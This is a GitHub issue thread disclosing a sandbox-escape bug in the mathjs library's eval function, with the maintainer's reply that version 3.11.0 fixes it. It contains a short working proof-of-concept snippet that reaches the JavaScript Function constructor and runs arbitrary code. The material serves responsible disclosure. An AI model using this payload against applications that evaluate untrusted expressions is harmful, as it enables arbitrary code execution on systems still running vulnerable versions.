New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security issues in eval #822

Closed
xfix opened this Issue Apr 2, 2017 · 3 comments

Comments

Projects
None yet
2 participants
@xfix

xfix commented Apr 2, 2017

I was going to report this privately, but I figured that somebody else already leaked issues (#821), so whatever. It's not that this may make things worse.

I read an article on Hacker News about discovering a bug in library, and I was like, surely there are more issues when you allow direct access to JavaScript. I do admit, finding such issues was a fun game, but I found this.

require('mathjs').eval(String.raw`
    {}.constructor.assign(cos.constructor, {binding: cos.bind})
    {}.constructor.assign(cos.constructor, {bind: null})
    cos.constructor.binding()("console.log(/HACKED/)")()
`)

Blacklists are practically guaranteed to have more issues like that. Don't allow direct access to JavaScript objects like that, especially not for function calls (you may want to have a whitelist of functions?).

@josdejong

This comment has been minimized.

Owner

josdejong commented Apr 2, 2017

Thanks a lot @xfix , keep them coming! Your issue should be solved in the just released v3.11.0

Thanks for thinking about reporting the issue in private, please do so the next time, that's always a good idea :)

@xfix

This comment has been minimized.

xfix commented Apr 2, 2017

@josdejong Okay, sent you an e-mail.

@josdejong

This comment has been minimized.

Owner

josdejong commented Apr 2, 2017

Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment